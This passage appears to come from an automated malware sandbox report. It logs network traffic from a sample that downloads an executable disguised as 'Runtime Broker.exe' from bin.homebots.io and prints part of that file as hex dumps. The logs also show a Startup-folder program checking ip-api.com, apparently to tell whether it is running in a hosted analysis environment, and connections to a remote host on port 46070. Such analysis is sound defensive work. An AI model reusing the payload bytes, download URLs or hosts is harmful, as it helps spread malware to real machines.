                                Oct 13, 2024 19:12:58.205162048 CEST5002146070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:12:58.206162930 CEST5002246070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:12:58.210093975 CEST4607050021193.161.193.99192.168.2.4
                                Oct 13, 2024 19:12:58.211148024 CEST4607050022193.161.193.99192.168.2.4
                                Oct 13, 2024 19:12:58.211230993 CEST5002246070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:12:58.226952076 CEST5002246070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:12:58.231949091 CEST4607050022193.161.193.99192.168.2.4
                                Oct 13, 2024 19:12:59.850019932 CEST4607050022193.161.193.99192.168.2.4
                                Oct 13, 2024 19:12:59.850263119 CEST5002246070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:13:01.402662992 CEST5002246070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:13:01.404428005 CEST5002346070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:13:01.407749891 CEST4607050022193.161.193.99192.168.2.4
                                Oct 13, 2024 19:13:01.409461021 CEST4607050023193.161.193.99192.168.2.4
                                Oct 13, 2024 19:13:01.409534931 CEST5002346070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:13:01.426114082 CEST5002346070192.168.2.4193.161.193.99
                                Oct 13, 2024 19:13:01.431427002 CEST4607050023193.161.193.99192.168.2.4
                                Oct 13, 2024 19:13:03.052736044 CEST4607050023193.161.193.99192.168.2.4
                                Oct 13, 2024 19:13:03.052913904 CEST5002346070192.168.2.4193.161.193.99

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 13, 2024 19:11:02.901424885 CEST5260353192.168.2.41.1.1.1
                                Oct 13, 2024 19:11:03.038038969 CEST53526031.1.1.1192.168.2.4
                                Oct 13, 2024 19:11:09.981040001 CEST5652253192.168.2.41.1.1.1
                                Oct 13, 2024 19:11:09.988173008 CEST53565221.1.1.1192.168.2.4
                                Oct 13, 2024 19:12:12.098248959 CEST5246753192.168.2.41.1.1.1
                                Oct 13, 2024 19:12:12.105202913 CEST53524671.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 13, 2024 19:11:02.901424885 CEST192.168.2.41.1.1.10xcf9bStandard query (0)bin.homebots.ioA (IP address)IN (0x0001)false
                                Oct 13, 2024 19:11:09.981040001 CEST192.168.2.41.1.1.10xa842Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                Oct 13, 2024 19:12:12.098248959 CEST192.168.2.41.1.1.10x5ca6Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 13, 2024 19:11:03.038038969 CEST1.1.1.1192.168.2.40xcf9bNo error (0)bin.homebots.iohomebots.ioCNAME (Canonical name)IN (0x0001)false
                                Oct 13, 2024 19:11:03.038038969 CEST1.1.1.1192.168.2.40xcf9bNo error (0)homebots.io143.178.83.216A (IP address)IN (0x0001)false
                                Oct 13, 2024 19:11:09.988173008 CEST1.1.1.1192.168.2.40xa842No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                Oct 13, 2024 19:12:12.105202913 CEST1.1.1.1192.168.2.40x5ca6No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                Oct 13, 2024 19:12:12.105202913 CEST1.1.1.1192.168.2.40x5ca6No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                Oct 13, 2024 19:12:12.105202913 CEST1.1.1.1192.168.2.40x5ca6No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • bin.homebots.io
                                • pastebin.com
                                • ip-api.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449732208.95.112.1804320C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                TimestampBytes transferredDirectionData
                                Oct 13, 2024 19:11:09.998233080 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                Oct 13, 2024 19:11:10.473622084 CEST175INHTTP/1.1 200 OK
                                Date: Sun, 13 Oct 2024 17:11:09 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 6
                                Access-Control-Allow-Origin: *
                                X-Ttl: 60
                                X-Rl: 44
                                Data Raw: 66 61 6c 73 65 0a
                                Data Ascii: false


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730143.178.83.2164432832C:\Users\user\Desktop\80BvHOM51j.exe
                                TimestampBytes transferredDirectionData
                                2024-10-13 17:11:03 UTC166OUTGET /f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622 HTTP/1.1
                                User-Agent: Mozilla/5.0
                                Host: bin.homebots.io
                                Cache-Control: no-cache
                                2024-10-13 17:11:04 UTC273INHTTP/1.1 200 OK
                                name: Runtime Broker.exe
                                content-type: application/x-msdownload
                                lastmodified: 1728762165438
                                content-length: 174080
                                last-modified: Sun Oct 13 2024 13:47:19 GMT+0000 (Coordinated Universal Time)
                                date: Sun, 13 Oct 2024 17:11:03 GMT
                                connection: close
                                2024-10-13 17:11:04 UTC16111INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 d1 0a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 0c 01 00 00 9a 01 00 00 00 00 00 fe 29 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5g) @@ @
                                2024-10-13 17:11:04 UTC16384INData Raw: 04 2b 0f 28 1c 01 00 06 28 ae 00 00 0a 80 34 00 00 04 07 80 33 00 00 04 17 2d b4 06 2a 1b 30 01 00 1a 00 00 00 00 00 00 00 20 03 00 00 80 28 20 01 00 06 26 de 0c 28 2f 00 00 0a 28 31 00 00 0a de 00 2a 00 00 01 10 00 00 00 00 00 00 0d 0d 00 0c 33 00 00 01 1b 30 03 00 41 00 00 00 33 00 00 11 20 00 01 00 00 73 28 01 00 0a 0b 28 1e 01 00 06 0c 08 07 20 00 01 00 00 28 1f 01 00 06 16 31 09 07 6f 93 00 00 0a 0a de 16 de 0c 28 2f 00 00 0a 28 31 00 00 0a de 00 72 24 06 00 70 0a 2b 00 06 2a 00 00 00 01 10 00 00 00 00 00 00 2b 2b 00 0c 33 00 00 01 13 30 02 00 10 00 00 00 34 00 00 11 28 fc 00 00 0a 02 6f fd 00 00 0a 0a 2b 00 06 2a 13 30 02 00 10 00 00 00 08 00 00 11 28 fc 00 00 0a 02 6f 2e 01 00 0a 0a 2b 00 06 2a 1b 30 03 00 73 00 00 00 35 00 00 11 1b 8d 03 00 00 01
                                Data Ascii: +((43-*0 ( &(/(1*30A3 s(( (1o(/(1r$p+*++304(o+*0(o.+*0s5
                                2024-10-13 17:11:04 UTC16384INData Raw: 67 34 53 44 67 41 33 51 58 59 4a 74 75 62 71 31 66 67 59 4f 62 32 73 79 73 31 4d 31 50 71 56 37 49 66 32 34 41 34 78 47 46 44 77 37 46 75 76 4c 42 64 42 00 74 37 41 43 4f 44 4e 73 45 68 69 32 4c 4e 73 43 57 31 73 4e 56 38 4d 67 42 00 6f 74 43 59 46 74 48 35 4e 39 41 59 7a 45 70 41 56 74 53 4c 69 46 4e 30 4a 45 76 58 37 67 38 71 43 6f 38 76 4a 74 46 4d 6a 4d 53 64 6b 64 62 55 57 64 63 78 41 31 50 35 70 42 00 54 32 54 38 35 59 55 6e 65 63 30 50 41 56 37 59 54 75 59 62 70 42 00 45 77 6a 50 6c 69 51 68 4f 4f 6a 47 4f 51 50 61 52 36 41 6a 69 6b 76 62 51 31 6b 35 4e 78 6c 54 6e 35 62 37 6f 73 45 4e 6b 62 46 49 41 55 71 55 34 76 79 68 64 51 67 64 71 66 33 43 74 6b 73 43 63 62 55 7a 44 53 78 4f 32 55 64 58 75 56 49 31 75 43 36 4a 75 6e 56 30 68 47 70 37 36 79 68
                                Data Ascii: g4SDgA3QXYJtubq1fgYOb2sys1M1PqV7If24A4xGFDw7FuvLBdBt7ACODNsEhi2LNsCW1sNV8MgBotCYFtH5N9AYzEpAVtSLiFN0JEvX7g8qCo8vJtFMjMSdkdbUWdcxA1P5pBT2T85YUnec0PAV7YTuYbpBEwjPliQhOOjGOQPaR6AjikvbQ1k5NxlTn5b7osENkbFIAUqU4vyhdQgdqf3CtksCcbUzDSxO2UdXuVI1uC6JunV0hGp76yh
                                2024-10-13 17:11:04 UTC16384INData Raw: 35 35 33 69 65 55 47 70 61 52 39 47 65 6c 57 45 52 73 00 47 72 61 70 68 69 63 73 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 46 72 6f 6d 53 65 63 6f 6e 64 73 00 67 65 74 5f 42 6f 75 6e 64 73 00 47 65 74 4d 65 74 68 6f 64 73 00 6b 59 5a 71 32 44 4a 34 75 77 39 4c 4b 73 46 62 36 70 30 6e 69 75 6d 72 73 62 51 68 56 67 57 41 51 6f 73 37 34 33 65 73 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 44 65 76 69 63 65 73 00 4d 79 57 65 62 53 65 72 76 69 63 65 73 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c
                                Data Ascii: 553ieUGpaR9GelWERsGraphicsSystem.DiagnosticsFromSecondsget_BoundsGetMethodskYZq2DJ4uw9LKsFb6p0niumrsbQhVgWAQos743esMicrosoft.VisualBasic.DevicesMyWebServicesMicrosoft.VisualBasic.ApplicationServicesSystem.Runtime.InteropServicesMicrosoft.Visual
                                2024-10-13 17:11:04 UTC16384INData Raw: 31 00 70 00 50 00 70 00 4d 00 6c 00 31 00 54 00 56 00 50 00 48 00 5a 00 4d 00 6d 00 33 00 72 00 64 00 4f 00 75 00 37 00 76 00 51 00 42 00 31 00 46 00 32 00 70 00 76 00 6b 00 4d 00 4f 00 76 00 78 00 6e 00 51 00 78 00 00 75 35 00 44 00 39 00 41 00 70 00 38 00 53 00 66 00 71 00 33 00 39 00 52 00 4a 00 6a 00 74 00 30 00 63 00 31 00 37 00 48 00 70 00 74 00 42 00 4f 00 58 00 4d 00 63 00 51 00 4c 00 49 00 68 00 46 00 70 00 6e 00 6f 00 6a 00 63 00 70 00 47 00 46 00 4b 00 36 00 32 00 34 00 59 00 77 00 33 00 4f 00 67 00 43 00 59 00 62 00 41 00 6f 00 75 00 50 00 44 00 61 00 00 75 38 00 61 00 4b 00 4a 00 54 00 52 00 66 00 33 00 65 00 53 00 49 00 65 00 41 00 35 00 6b 00 35 00 48 00 48 00 7a 00 78 00 42 00 59 00 7a 00 32 00 46 00 63 00 67 00 69 00 59 00 4c 00 73 00 74
                                Data Ascii: 1pPpMl1TVPHZMm3rdOu7vQB1F2pvkMOvxnQxu5D9Ap8Sfq39RJjt0c17HptBOXMcQLIhFpnojcpGFK624Yw3OgCYbAouPDau8aKJTRf3eSIeA5k5HHzxBYz2FcgiYLst
                                2024-10-13 17:11:04 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii:
                                2024-10-13 17:11:04 UTC16384INData Raw: ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff e6 a0 21 f5 e0 92 15 f0 df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff d4 78 00 b0 d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78
                                Data Ascii: (((((((((((((((((((((!xxxxxxxxxxxxxxxxxxx
                                2024-10-13 17:11:04 UTC16384INData Raw: ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 ff b8 64 03 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 78 00 50 d4 78 00 f0 d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78
                                Data Ascii: ddddddddddddddddddddxPxxxxx
                                2024-10-13 17:11:04 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii:
                                2024-10-13 17:11:04 UTC16384INData Raw: ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d9 82 08 ff e2 96 19 ff e9 a7 27 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff e6 a0 21 f9 e0 93 16 fb df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 d4 d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78
                                Data Ascii: xxxxxxxxxxxxx'((((((((((((((((((((((!xxxxxxxxx


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449731143.178.83.2164432832C:\Users\user\Desktop\80BvHOM51j.exe
                                TimestampBytes transferredDirectionData
                                2024-10-13 17:11:04 UTC166OUTGET /f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622 HTTP/1.1
                                User-Agent: Mozilla/5.0
                                Host: bin.homebots.io
                                Cache-Control: no-cache
                                2024-10-13 17:11:05 UTC273INHTTP/1.1 200 OK
                                name: Runtime Broker.exe
                                content-type: application/x-msdownload
                                lastmodified: 1728762165438
                                content-length: 174080
                                last-modified: Sun Oct 13 2024 13:47:19 GMT+0000 (Coordinated Universal Time)
                                date: Sun, 13 Oct 2024 17:11:05 GMT
                                connection: close
                                2024-10-13 17:11:05 UTC14207INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 d1 0a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 0c 01 00 00 9a 01 00 00 00 00 00 fe 29 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5g) @@ @
                                2024-10-13 17:11:05 UTC16384INData Raw: 00 3a 01 00 00 01 01 00 00 3b 02 00 00 0f 00 00 00 33 00 00 01 1b 30 04 00 2e 00 00 00 2a 00 00 11 28 5d 00 00 0a 0b 7e 2a 00 00 04 02 07 6f 0c 01 00 0a 28 d3 00 00 06 16 28 d0 00 00 06 0a de 0c de 0a 07 2c 06 07 6f 5a 00 00 0a dc 06 2a 00 00 01 10 00 00 02 00 06 00 1c 22 00 0a 00 00 00 00 1b 30 07 00 d9 02 00 00 2b 00 00 11 02 16 3f c0 02 00 00 03 20 00 01 00 00 28 0d 01 00 0a 28 0e 01 00 0a 39 ab 02 00 00 04 28 0f 01 00 0a 8c 84 00 00 01 13 04 1f 14 28 d6 00 00 06 20 ff ff 00 00 5f 16 fe 01 16 fe 01 8c 43 00 00 01 0b 20 a0 00 00 00 28 d6 00 00 06 20 00 80 00 00 5f 16 33 16 20 a1 00 00 00 28 d6 00 00 06 20 00 80 00 00 5f 16 33 03 16 2b 01 17 8c 43 00 00 01 0d 11 04 28 10 01 00 0a 28 ce 00 00 06 0c 07 28 11 01 00 0a 2d 10 09 28 11 01 00 0a 2d 08 16 8c 43
                                Data Ascii: :;30.*(]~*o((,oZ*"0+? ((9(( _C ( _3 ( _3+C(((-(-C
                                2024-10-13 17:11:05 UTC16384INData Raw: 47 57 47 35 00 6b 4a 47 66 32 38 4f 37 4d 65 57 52 6b 4b 35 33 35 5a 32 79 45 66 49 68 50 4d 65 55 4d 4a 46 53 57 50 46 32 32 58 66 53 6e 62 38 51 45 52 4a 55 77 72 61 73 65 61 67 45 33 64 45 6f 46 6f 73 4f 41 65 70 4d 35 63 6d 58 6f 45 50 56 65 45 36 47 6c 70 43 57 34 51 61 47 64 32 67 57 55 7a 54 4f 4c 35 00 66 51 42 79 66 48 57 62 55 34 72 35 79 62 78 50 47 58 55 65 6c 6a 53 52 35 00 54 56 42 59 55 54 43 46 4d 4d 4f 6d 78 67 6e 4f 79 71 6d 42 76 35 00 47 7a 57 55 33 42 62 51 44 68 71 58 62 49 4c 4f 38 4b 43 4b 7a 35 00 36 47 61 31 53 63 58 41 31 62 51 78 4a 59 4b 7a 58 57 52 4f 6d 69 78 47 36 00 70 47 31 79 71 79 59 36 45 53 45 4b 41 39 50 62 63 6a 4d 39 73 32 43 4e 78 6d 5a 79 79 74 49 4b 4b 38 36 49 72 51 79 75 42 64 59 4c 36 53 53 35 67 4b 30 4d 6b
                                Data Ascii: GWG5kJGf28O7MeWRkK535Z2yEfIhPMeUMJFSWPF22XfSnb8QERJUwraseagE3dEoFosOAepM5cmXoEPVeE6GlpCW4QaGd2gWUzTOL5fQByfHWbU4r5ybxPGXUeljSR5TVBYUTCFMMOmxgnOyqmBv5GzWU3BbQDhqXbILO8KCKz56Ga1ScXA1bQxJYKzXWROmixG6pG1yqyY6ESEKA9PbcjM9s2CNxmZyytIKK86IrQyuBdYL6SS5gK0Mk
                                2024-10-13 17:11:05 UTC16384INData Raw: 00 50 61 72 61 6d 65 74 65 72 49 6e 66 6f 00 43 6f 6d 70 75 74 65 72 49 6e 66 6f 00 50 72 6f 63 65 73 73 53 74 61 72 74 49 6e 66 6f 00 47 65 74 4c 61 73 74 49 6e 70 75 74 49 6e 66 6f 00 44 69 72 65 63 74 6f 72 79 49 6e 66 6f 00 33 33 41 6a 46 5a 48 74 37 4a 56 53 42 6c 4a 6f 74 49 54 6f 66 6f 00 71 37 61 31 75 73 47 56 49 71 43 63 6b 4a 38 32 39 67 30 6a 42 61 37 41 39 4f 76 4d 57 78 78 36 54 76 36 32 43 58 6e 6f 00 73 7a 73 68 73 53 36 31 33 76 38 68 6a 72 46 61 65 63 66 41 71 6f 00 5a 65 72 6f 00 67 35 65 62 33 6d 63 6b 4d 57 41 56 46 78 30 39 5a 44 78 6c 75 6f 00 72 30 57 4e 54 57 79 56 44 30 53 69 69 50 62 55 78 6c 67 74 75 6f 00 78 72 6b 34 52 4c 79 52 69 65 70 55 4d 4f 4c 35 76 6a 6b 74 30 69 42 6c 36 55 7a 52 7a 79 45 4d 41 62 44 76 6b 58 77 6f 00
                                Data Ascii: ParameterInfoComputerInfoProcessStartInfoGetLastInputInfoDirectoryInfo33AjFZHt7JVSBlJotITofoq7a1usGVIqCckJ829g0jBa7A9OvMWxx6Tv62CXnoszshsS613v8hjrFaecfAqoZerog5eb3mckMWAVFx09ZDxluor0WNTWyVD0SiiPbUxlgtuoxrk4RLyRiepUMOL5vjkt0iBl6UzRzyEMAbDvkXwo
                                2024-10-13 17:11:05 UTC16384INData Raw: 67 00 5a 00 56 00 6a 00 34 00 79 00 62 00 63 00 72 00 67 00 46 00 72 00 70 00 42 00 77 00 65 00 4b 00 47 00 6b 00 55 00 66 00 58 00 44 00 55 00 6f 00 00 33 43 00 30 00 57 00 7a 00 65 00 42 00 54 00 37 00 31 00 49 00 67 00 31 00 69 00 79 00 5a 00 45 00 34 00 71 00 45 00 6f 00 7a 00 38 00 39 00 61 00 45 00 00 33 70 00 6e 00 70 00 41 00 32 00 6b 00 4d 00 59 00 4f 00 6f 00 7a 00 58 00 4b 00 41 00 76 00 58 00 52 00 72 00 44 00 70 00 69 00 76 00 53 00 33 00 35 00 00 33 69 00 42 00 69 00 4a 00 4c 00 4e 00 51 00 54 00 44 00 53 00 6c 00 72 00 70 00 52 00 6a 00 62 00 71 00 57 00 31 00 63 00 47 00 44 00 57 00 6e 00 37 00 00 75 62 00 68 00 4d 00 33 00 55 00 6b 00 68 00 4c 00 52 00 35 00 56 00 63 00 6e 00 38 00 53 00 75 00 6b 00 68 00 75 00 4f 00 47 00 4f 00 48 00 42
                                Data Ascii: gZVj4ybcrgFrpBweKGkUfXDUo3C0WzeBT71Ig1iyZE4qEoz89aE3pnpA2kMYOozXKAvXRrDpivS353iBiJLNQTDSlrpRjbqW1cGDWn7ubhM3UkhLR5Vcn8SukhuOGOHB
                                2024-10-13 17:11:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii:
                                2024-10-13 17:11:05 UTC16384INData Raw: ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 ff df 90 14 c0 00 00 00 00 d4 78 00 b0 d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d8 81 08 ff e2 96 19 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8
                                Data Ascii: xxxxxxxxxxxxxxxxxxxxxxxx(((((((((((((((((((((((((((
                                2024-10-13 17:11:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 78 00 10 d4 78 00 f0 d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78 00 ff d4 78
